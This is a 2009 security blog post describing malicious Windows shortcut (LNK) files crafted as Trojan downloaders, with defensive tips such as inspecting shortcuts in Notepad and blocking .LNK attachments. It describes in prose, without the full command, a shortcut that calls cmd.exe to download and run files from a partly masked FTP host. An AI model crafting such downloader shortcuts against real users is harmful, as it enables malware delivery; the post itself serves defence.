Published: May 27 2009, 10:44 PM
by Methusela Cebrian Ferrer

Amidst the bulk of malicious executables we deal with everyday, there’s an interesting attack vector using Windows Shortcuts - referred to as LNK files due to their file extension of .LNK.

These are small files that contain information such as the name and path of the target program it represents. Additionally, LNK files can also store information about the file attributes of its target program, local and network location and command line arguments.
                                          
                                   
 

A good example of a very common shortcut file you’ll find on the desktop is Internet Explorer. However, visually recognizing whether it is clean or malicious is not an easy task. As a result, you could easily end up executing the file before realizing that it is suspicious.

In recent cases, malicious LNK files were crafted as Trojan downloaders, sometimes disguised as a legitimate file, program or folder to persuade its target victim to execute it.

                                                                    

Figure 03 shows what you would see if you dragged a malicious LNK file to a text editor such as Notepad:
       


In this example, you’ll find a short argument is passed through cmd.exe, which will connect to a malicious FTP server (ftp://g***.vicp.net) to download and execute ntdet.exe in C:\ and pub.vbs in the Windows directory. This is just one example and it demonstrates how any attacker could craft a malicious LNK file by changing its icon and downloader behavior according to their intent.

Furthermore, Windows users may receive this threat through email, browser exploit and/or bundled with other malicious files.

Take extra precautions with this kind of trick by following our recommendations below:

•  Think twice before clicking on a shortcut file. If in doubt, simply drag the file to Notepad and check for any suspicious strings.
•  Include .LNK extensions in your list of unwanted email attachments; this is a must for enterprise email blocking and filtering administration.
  
•  Stay up to date with software patches to avoid exploit attack vectors. 
  
• Make sure your security software is working and uses the latest signature update.
  

Stay Safe!

Share this post:  Email

Share